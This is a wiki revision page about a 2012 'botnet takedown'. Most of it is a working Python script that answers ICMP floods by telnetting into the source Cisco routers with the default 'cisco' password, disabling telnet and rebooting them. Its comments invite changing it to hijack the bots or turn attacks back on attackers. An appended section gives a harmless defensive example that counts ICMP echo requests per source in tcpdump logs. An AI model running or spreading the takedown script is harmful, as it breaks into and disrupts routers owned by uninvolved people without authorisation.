Difference between revisions of "DDoS Attacks/takedowns/Krashed"

From NetSec

Revision as of 19:41, 16 July 2012

Subject Identification

  • First encounter: 2600net, fail DDoS'd home router.
  • Aliases: Krashed, [Krashed].

Upon joining my IRC network, Krashed DDoS'd it with his fail Cisco botnet. He scans for routers with the default login as "cisco" then uses them in fail DDoS attacks. To combat this, I wrote the script below which detects incoming ICMP packets (yes, he does use ICMP floods), then telnets back to the connection, logs in with "cisco", runs the enable command to elevate privileges, disables telnet and reboots the router to stop the running attack and prevent any future attacks. He could not put me down after this. It also has support for tcpdump logs and lists of IP addresses, in case you use it after the fact. While this script uses default passwords, it could be modified to use a Cisco IOS exploit or bruteforce the passwords, in case he gets smart (not likely, look at who we are dealing with here, he uses Ciscos).

 
#!/usr/bin/python
 
# botnet-takedown.py
# (C) 2012 rorschach
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 1, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
# ----------------------------------------------------------------------
#
# Cisco botnet takedown script.
# Written by rorschach
# Use at your own risk, the actions taken by this app may not be legal.
#
# Run in daemon mode (-d) it will listen for ICMP packets, when it sees one
# it will attempt to attack the IP. 
#
# In tcpdump parse mode (-t) it will parse a tcpdump log for offending
# IP addresses.
#
# In IP list mode (-i) it simply takes in a list of IP adresses to attack.
#
# This script will login to open Cisco routers, turn off telnet and
# then reboot it. The functionality could be modified to do things
# like take over the bot so only you can use it, turn the attack on
# the attacker, etc. The sky is really the limit here. Modify the 
# takedown() function for this.
#
# Dependencies: python 2.x and scapy
# To install on Ubuntu:
#
#  sudo apt-get install python-scapy
#
# This script must be ran as root if using daemon mode, due to the fact
# that it sniffs packets using scapy.
#
# Enjoy the script.
 
import sys, telnetlib, re, os, time, socket, threading
from threading import Thread
from scapy.all import *
 
def usage(argZero):
  print "Usage: " + argZero
  print "  * -d               -- Daemon mode, parse IPs live from incoming ICMP packets."
  print "  * -t <tcpdump log> -- Parse IPs from tcpdump log."
  print "  * -i <ip list>     -- Load IPs from list."
  sys.exit(1)
 
def takedown(ip):    # Disable router using telnet.
  print " [*] Disabling " + ip.rstrip()
  try:
    tn = telnetlib.Telnet(ip,23,2)
 
    tn.read_until("Password:", timeout=2) # modify these commands to change functionality
    tn.write("cisco\n")
    tn.read_until(">", timeout=2)
    tn.write("enable\n")
    tn.read_until("Password:", timeout=2)
    tn.write("cisco\n")
    tn.read_until("#", timeout=2)
    tn.write("config\n")
    tn.read_until("Configuring from terminal, memory, or network [terminal]?", timeout=2)
    tn.write("\n")
    tn.read_until("(config)#", timeout=2)
    tn.write("line vty 0 4\n")
    tn.read_until("(config-line)#", timeout=2)
    tn.write("transport input none\n")
    tn.read_until("(config-line)#", timeout=2)
    tn.write("end\n")   # leave config mode; the literal string "^Z" is not Ctrl-Z and IOS rejects it
    tn.read_until("#", timeout=2)
    tn.write("reload\n")
    tn.read_until("System configuration has been modified. Save? [yes/no]:", timeout=2)
    tn.write("yes\n")
    tn.read_until("Proceed with reload? [confirm]", timeout=2)
    tn.write("\n")
 
    tn.close()
  except:
    print "  [*] Error: " + ip.rstrip()
 
def takedownParse(pkt,ips): # Only act on ICMP echo-requests from sources not seen before, then run takedown() in a thread
  # Use scapy's layer access instead of splitting pkt.summary(): the summary
  # field positions shift when an Ether layer is present, so index-based
  # parsing silently misses every packet on ordinary Ethernet interfaces.
  if pkt.haslayer(IP) and pkt.haslayer(ICMP) and pkt[ICMP].type == 8:  # type 8 = echo-request
    ip = pkt[IP].src
    if ip not in [eip.rstrip() for eip in ips]:
      ips.append(ip)
      f = open("/root/takedown.log", "a+")
      f.write(ip + "\r\n")
      f.close()
      t = threading.Thread(target=takedown,args=(ip,))
      t.start()
 
def loadIPs(file):  # load IP list from file
  f = open(file, "r")
  ips = f.readlines()
  f.close()
 
  for ip in ips:
    takedown(ip.rstrip())
 
def parseDumpLogs(logFile):  # parse tcpdump logs (main() passes only the log path)
  currentTime = time.time()
  num = 0
  print " [*] Initiating takedown"
  print " [*] Reading tcpdump file"
 
  f = open(logFile, "r")  # open log, filter out non-icmp packets
  ips = f.readlines()
  f.close()
  for n,ip in enumerate(ips):
    try:
      # old tcpdump output: "<time> IP <src> > <dst>: icmp <len>: echo request seq <n>"
      if ip.split()[5] == "icmp":
        ips[n] = ip.split()[2].rstrip()
      else:
        ips[n] = "null"
    except IndexError:
      ips[n] = "null"     # short or malformed line, never treat it as an address
 
  ips = list(set(ips))   # remove duplicates
 
  print " [*] Resolving hostnames to IP addresses"
 
  for n,ip in enumerate(ips):  # if there is a letter in the IP, resolve it to an IP address
    if(re.search("[a-zA-Z]",ip) != None and ip != socket.gethostname() and ip != "null"):
      try:
        tempIP = socket.gethostbyname(ip)
        if(tempIP != None):
          ips[n] = tempIP.rstrip()
      except socket.error:
        pass
 
  for n,ip in enumerate(ips): # remove extraneous data
    if(ip != socket.gethostname() and ip != "null" and ip != ""):
      if(ip.find(":") != -1):   # drop IPv6 addresses, the telnet step only handles IPv4
        ips[n] = "null"
      else:
        num += 1
 
  print " [*] Taking down " + str(num) + " zombies"
 
  for ip in ips:        # takedown each IP address
    if(ip != socket.gethostname() and ip != "null" and ip != ""):
      takedown(ip)
 
  print " [*] Takedown complete\r\n\r\nTook down " + str(num) + " IPs in " + str(time.time() - currentTime) + " seconds."
 
def takedownDaemon():       # start sniffing and read IP log
  ips = []
  if os.path.exists("/root/takedown.log"):   # log does not exist on first run
    f = open("/root/takedown.log", "r")
    ips = f.readlines()
    f.close()
 
  print "\r\n -- IPs previously taken down -- \r\n"
  for ip in ips:
    print " [*] " + ip.rstrip()
  print "\r\n ------------------------------- \r\n"
 
  if os.fork() == 0:
    if os.fork() == 0:
      sniff(prn=lambda pkt:takedownParse(pkt,ips), store=0)
 
def main():
  print "botnet-takedown.py"
 
  if(len(sys.argv) < 2):
    usage(sys.argv[0])
 
  if(sys.argv[1] == "-d"):  # daemon mode, takes no further arguments
    takedownDaemon()
 
  elif(sys.argv[1] == "-t"): # tcpdump logs
    if(len(sys.argv) == 3):
      parseDumpLogs(sys.argv[2])
    else:
      usage(sys.argv[0])
 
  elif(sys.argv[1] == "-i"): # ip log mode
    if(len(sys.argv) == 3):
      loadIPs(sys.argv[2])
    else:
      usage(sys.argv[0])
 
  else:
    usage(sys.argv[0])
 
if __name__ == "__main__":
  main()
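The tcpdump-parse mode above keys on whitespace-split fields of old tcpdump output and acts on the very first echo request it sees from a source. The following is an added example, not part of the wiki's script, showing the detection step from a defender's side: it recognises both the old 3.x style (`icmp 64: echo request`) and the newer 4.x style (`ICMP echo request, id ...`) lines, counts ICMP echo requests per source, and only flags sources above a threshold, so a single stray ping is not mistaken for a flood. Written for Python 3; the log lines are constructed, and hostnames are left as tcpdump printed them (capture with `tcpdump -n` to skip resolution).

```python
import re
from collections import Counter

# Constructed sample tcpdump output: old 3.x style ("icmp 64: echo request"),
# newer 4.x style ("ICMP echo request, id ..."), an echo reply, a TCP SYN and
# an IPv6 ping that the IPv4-only pattern below must ignore.
SAMPLE_LOG = """\
12:00:01.000001 IP 192.0.2.10 > 198.51.100.5: icmp 64: echo request seq 1
12:00:01.000002 IP 192.0.2.10 > 198.51.100.5: icmp 64: echo request seq 2
12:00:01.000003 IP 192.0.2.10 > 198.51.100.5: icmp 64: echo request seq 3
12:00:01.000004 IP 198.51.100.5 > 192.0.2.10: icmp 64: echo reply seq 1
12:00:01.000005 IP 203.0.113.7 > 198.51.100.5: ICMP echo request, id 9, seq 1, length 64
12:00:01.000006 IP 203.0.113.7 > 198.51.100.5: ICMP echo request, id 9, seq 2, length 64
12:00:01.000007 IP 192.0.2.44.51234 > 198.51.100.5.6667: Flags [S], seq 1, win 8192, length 0
12:00:01.000008 IP 192.0.2.99 > 198.51.100.5: ICMP echo request, id 3, seq 1, length 64
12:00:01.000009 IP6 2001:db8::1 > 2001:db8::5: ICMP6, echo request, seq 1, length 16
"""

# One IPv4 ICMP echo request line in either tcpdump output style.
ECHO_REQUEST = re.compile(
    r"^\S+ IP (?P<src>\S+) > (?P<dst>\S+): "
    r"(?:icmp \d+: echo request|ICMP echo request)"
)


def echo_request_sources(lines, ignore=()):
    """Count ICMP echo requests per source as printed by tcpdump.

    Hostnames are kept as printed (capture with 'tcpdump -n' to avoid
    resolution); sources listed in 'ignore' (your own hosts) are skipped.
    """
    counts = Counter()
    for line in lines:
        m = ECHO_REQUEST.match(line)
        if m and m.group("src") not in ignore:
            counts[m.group("src")] += 1
    return counts


def flood_sources(counts, threshold):
    """Return (source, count) pairs at or above threshold, busiest first."""
    hits = [(src, n) for src, n in counts.items() if n >= threshold]
    return sorted(hits, key=lambda item: (-item[1], item[0]))


if __name__ == "__main__":
    counts = echo_request_sources(SAMPLE_LOG.splitlines(), ignore={"198.51.100.5"})
    for src, n in flood_sources(counts, threshold=2):
        print("%s sent %d ICMP echo requests" % (src, n))
```

On a real capture, set the threshold from the observed baseline echo-request rate for the capture window rather than the fixed value used here.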